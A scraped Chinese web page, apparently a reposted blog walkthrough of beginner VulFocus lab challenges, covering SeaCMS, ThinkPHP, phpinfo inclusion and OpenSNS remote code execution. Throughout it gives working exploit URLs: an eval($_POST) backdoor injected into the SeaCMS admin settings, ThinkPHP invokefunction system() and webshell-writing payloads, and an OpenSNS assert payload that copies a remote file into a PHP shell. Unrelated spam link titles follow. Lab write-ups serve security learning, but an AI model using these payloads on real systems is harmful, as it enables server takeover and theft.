当前位置: 首页 > news >正文

网站开发实训小结哈尔滨互联网广告公司

网站开发实训小结,哈尔滨互联网广告公司,东台建设网站,小程序开发和app开发差别漏洞指北-VulFocus靶场专栏-初级 初级001 #x1f338;海洋CMS代码执行#xff08;CNVD-2020-22721#x1f338;step1#xff1a;进入后台页面 账号密码#xff1a;admin amdinstep2#xff1a;点击系统#xff0c;点击后台IP安全设置,关闭step3 启动burpsuite#xff… 漏洞指北-VulFocus靶场专栏-初级 初级001 海洋CMS代码执行CNVD-2020-22721step1进入后台页面 账号密码admin amdinstep2点击系统点击后台IP安全设置,关闭step3 启动burpsuite启动代理抓请求包step4 http请求包中加入后门等200 的响应状态码step5 200OK 进入admin页面,寻找flag结束 初级002 thinkphp 代码执行 (CNVD-2018-24942)方法1构造payload远程代码执行输入ls /tmp指令方法2: 构造一句话木马result探囊取物 初级003 phpinfo-inclusion 文件写入step1 去指定地址的phpinfo.php文件夹下面step2 获取信息后 寻找flag 初级004 opensns 命令执行 CNVD-2021-34590step1 构造网页的payload即可方案2 hackbar 初级001 海洋CMS代码执行CNVD-2020-22721 原因 命令执行漏洞在w1aqhp/admin_ip.php下第五行使用set参数对用户输入没有进行任何处理直接写入文件。攻击者可利用该漏洞执行恶意代码获取服务器权限。 后台路径/manager 后台密码admin:admin 解决方案 step1进入后台页面 账号密码admin amdin http://10.11.12.28:17302/manager/login.php step2点击系统点击后台IP安全设置,关闭 拼接指令cmd ls /tmp cmd就是执行shell的命令 常见的flag一般都是在/tmp页面下 注意‘ ’的符号是%20 后面玩捉迷藏有时候会用到这个点。 step3 启动burpsuite启动代理抓请求包 step4 http请求包中加入后门等200 的响应状态码 v0ip11111111111;phpinfo();eval($_POST[cmd]);// step5 200OK 进入admin页面,寻找flag结束 http://10.11.12.28:17302/manager/admin_ip.php 初级002 thinkphp 代码执行 (CNVD-2018-24942) 原因 由于框架对控制器名未能进行足够的检测攻击者利用该漏洞对目标网站进行远程命令执行攻击。 解决方案 方法1构造payload远程代码执行输入ls /tmp指令 http://10.11.12.28:24050/?sindex/\think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]ls%20/tmp 方法2: 构造一句话木马 http://10.11.12.28:24050/?sindex/\think\template\driver\file/writecacheFileshell.phpcontent%3C?php%20eval($_POST[pass])?%3E result探囊取物 初级003 phpinfo-inclusion 文件写入 原因 phpinfo()常用于在系统上检查配置设置和预定义变量。 通过写入脚本文件然后读取从而getshell step1 去指定地址的phpinfo.php文件夹下面 http://10.11.12.28:20756/phpinfo.php step2 获取信息后 寻找flag 初级004 opensns 命令执行 CNVD-2021-34590 原因 OpenSNS存在命令执行漏洞攻击者可利用该漏洞获取服务器控制权限 step1 构造网页的payload即可 http://10.11.12.28:61968/index.php?sweibo/Share/shareBoxqueryappCommon%26modelSchedule%26methodrunSchedule%26id[status]1%26id[method]Schedule-%3E_validationFieldItem%26id[4]function%26id[0]cmd%26id[1]assert%26id[args]cmdphpinfo() 方案2 hackbar http://10.11.12.28:61968/index.php?sweibo/Share/shareBoxqueryappCommon%26modelSchedule%26methodrunSchedule%26id[status]1%26id[method]Schedule-%3E_validationFieldItem%26id[4]function%26id[0]cmd%26id[1]assert%26id[args]cmdcopy(%27http://xxx/a.txt%27,%27a.php%27)
http://www.sadfv.cn/news/105995/

相关文章:

  • 自建团体电子商务网站建设成本做网站编辑需要什么文凭
  • 安康网站开发建设网站的报价
  • 绿地建设集团网站哪个网站可以做微商
  • 中英文网站价格网站建设与管理 教学视频
  • 重庆网站建设子沃科技公司建设局特种作业网站
  • 有用的网站地址前端写一个页面多少钱
  • 坤和建设 网站网络加速器下载
  • 个人网站引导页源码最好建网站系统的软件
  • 制作简单的站点推广方案wix怎么做网站
  • 用花生棒自己做内网网站网站建设答辩ppt要点
  • 成都网站托管海事网站开发
  • 兰州市规划建设局网站互联网信息服务业务经营许可证
  • 网站建设协议网站购买后如何做
  • 公司宣传网站建站石家庄经济
  • 律师事务所手机网站做维修广告效最好是哪个网站吗
  • 外围网站代理怎么做游戏推广app平台
  • 公司网站源码 带wap手机站网络公司给别人做网站的cms是买的授权么
  • wordpress设置网站地图网站建设及推广外包
  • 如何做旅游网站推销成都广告公司贺忠阳简历
  • 非法网站开发seo怎么优化一个网站
  • 建站宝盒里的手机网站旅游网站总结
  • 二手商品网站制作建设网站的服务宗旨
  • 门户网站设计特点网站建设用到什么软件
  • 专业开发网站企业免费网站流量统计
  • 玮科网站建设湛江本地做网站
  • 有什么网站可以做编程题wordpress去除版权
  • ui设计师的职业规划莱芜网站建设及优化
  • 网站开发项目概述公司一个人做网站
  • 怎么查网站空间在哪里wordpress登录地址更改
  • 建设景区网站推文鞍山+网站建设